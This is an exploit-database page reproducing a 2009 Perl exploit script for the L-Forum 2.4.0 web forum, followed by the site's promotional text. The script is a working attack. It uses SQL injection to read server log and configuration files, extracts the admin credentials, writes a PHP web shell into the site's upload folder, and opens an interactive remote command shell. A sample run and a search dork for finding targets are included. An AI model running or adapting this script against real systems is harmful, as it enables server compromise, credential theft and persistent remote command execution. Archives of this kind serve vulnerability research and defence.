Vulners
Lucene search
L-Forum 2.4.0 SQL Injection / Command Execution
`#!/usr/bin/perl
# Web App: L-Forum 2.4.0
# Link : http://l-forum.sourceforge.net/
# Bug : SQL INJECTIONS
# SQL Command Injection Exploit
# Needs MQ Off
# Dork: Copyright 2000-2001 Leszek 'Leon' Krupinski
# Credits to Giovanni Buzzin, "Osirys"
# Mail: osirys[at]autistici[dot]org
# ------------------------------------------------------------------------
# Sploit on localhost
# ------------------------------------------------------------------------
# osirys[~]>$ perl spl0.txt http://localhost/l-forum-2.4.0/
#
# ---------------------------
# L-Forum
# Command Inj Exploit
# by Osirys
# ---------------------------
#
# [*] Generating error through GET request ..
# [*] Cheeking Apache Error Log path ..
# [*] Error Log path found -> /var/log/httpd/error_log
# [*] Website path found -> /home/osirys/web/l-forum-2.4.0/
# [*] Getting admin login details ..
# [$] User: admin
# [$] Pass: adminpass
# [*] Shell succesfully injected !
# [&] Hi my master, do your job now [!]
#
# shell[localhost]$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell[localhost]$> pwd
# /home/osirys/web/l-forum-2.4.0/upload
# shell[localhost]$> exit
# [-] Quitting ..
# osirys[~]>$
# ------------------------------------------------------------------------
use IO::Socket;
use LWP::UserAgent;
my $host = $ARGV[0];
my $path_ = "/upload/";
my $rand = int(rand 9) +1;
my @error_logs = qw(
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/usr/local/apache/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error.log
/var/log/error_log
/apache/logs/error.log
);
my $php_c0de = "<?php echo \"st4rt\";system(\$_GET[cmd]);?>";
($host) || help("-1");
cheek($host) == 1 || help("-2");
&banner;
$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);
print "[*] Generating error through GET request ..\n";
get_req($host."/osirys_log_test".$rand);
print "[*] Cheeking Apache Error Log path ..\n";
while (($log = <@error_logs>)&&($gotcha != 1)) {
$tmp_path = $host."/new.php?f=0&r=-1 union select 1,2,3,4,load_file('".$log."'),6,7,8,9,10,11,12,13,14,15,16";
$re = get_req($tmp_path);
if ($re =~ /File does not exist: (.+)\/osirys_log_test$rand/) {
$site_path = $1."/";
$gotcha = 1;
print "[*] Error Log path found -> $log\n";
print "[*] Website path found -> $site_path\n";
}
}
$gotcha == 1 || die "[-] Couldn't file error_log !\n";
print "[*] Getting admin login details ..\n";
my $url = $host."/new.php?f=0&r=-1 union select 1,2,3,4,load_file('".$site_path."/config.php'),6,7,8,9,10,11,12,13,14,15,16";
my $re = get_req($url);
if ($re =~ /\$admin_name(\s)*= '(.+)';/) {
$user = $2;
if ($re =~ /\$admin_pass(\s)*= '(.+)';/) {
$pass = $2;
print "[\$] User: $user\n";
print "[\$] Pass: $pass\n";
}
}
else {
print "[-] Can't extract admin details\n\n";
}
&inj_shell;
sub inj_shell {
my $attack = $host."/read.php?f=0&i=-1 union select 1,2,3,4,5,6,7,8,9,'".$php_c0de."' into outfile '".$site_path.$path_."1337.php'";
get_req($attack);
my $test = get_req($host."/upload/1337.php");
if ($test =~ /st4rt/) {
print "[*] Shell succesfully injected !\n";
print "[&] Hi my master, do your job now [!]\n\n";
$exec_path = $host."/shell.php";
&exec_cmd;
}
else {
print "[-] Shell not found \n[-] Exploit failed\n\n";
exit(0);
}
}
sub exec_cmd {
$h0st !~ /www\./ || $h0st =~ s/www\.//;
print "shell[$h0st]\$> ";
$cmd = <STDIN>;
$cmd !~ /exit/ || die "[-] Quitting ..\n";
$exec_url = $host.$path_."1337.php?cmd=".$cmd;
my $re = get_req($exec_url);
my $content = tag($re);
if ($content =~ /st4rt(.+)/) {
my $out = $1;
$out =~ s/\$/ /g;
$out =~ s/\*/\n/g;
chomp($out);
print "$out\n";
&exec_cmd;
}
else {
$c++;
$cmd =~ s/\n//;
print "bash: ".$cmd.": command not found\n";
$c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n";
&exec_cmd;
}
}
sub get_req() {
$link = $_[0];
my $req = HTTP::Request->new(GET => $link);
my $ua = LWP::UserAgent->new();
$ua->timeout(4);
my $response = $ua->request($req);
return $response->content;
}
sub cheek() {
my $host = $_[0];
if ($host =~ /http:\/\/(.*)/) {
return 1;
}
else {
return 0;
}
}
sub get_input() {
my $host = $_[0];
$host =~ /http:\/\/(.*)/;
$s_host = $1;
$s_host =~ /([a-z.-]{1,30})\/(.*)/;
($h0st,$path) = ($1,$2);
$path =~ s/(.*)/\/$1/;
$full_det = $h0st." ".$path;
return $full_det;
}
sub tag() {
my $string = $_[0];
$string =~ s/ /\$/g;
$string =~ s/\s/\*/g;
return($string);
}
sub banner {
print "\n".
" ---------------------------\n".
" L-Forum \n".
" Command Inj Exploit \n".
" by Osirys \n".
" ---------------------------\n\n";
}
sub help() {
my $error = $_[0];
if ($error == -1) {
&banner;
print "\n[-] Input data failed ! \n";
}
elsif ($error == -2) {
&banner;
print "\n[-] Bad hostname address !\n";
}
print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
exit(0);
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Mar 2009 00:00Current
0.2Low risk
Vulners AI Score0.2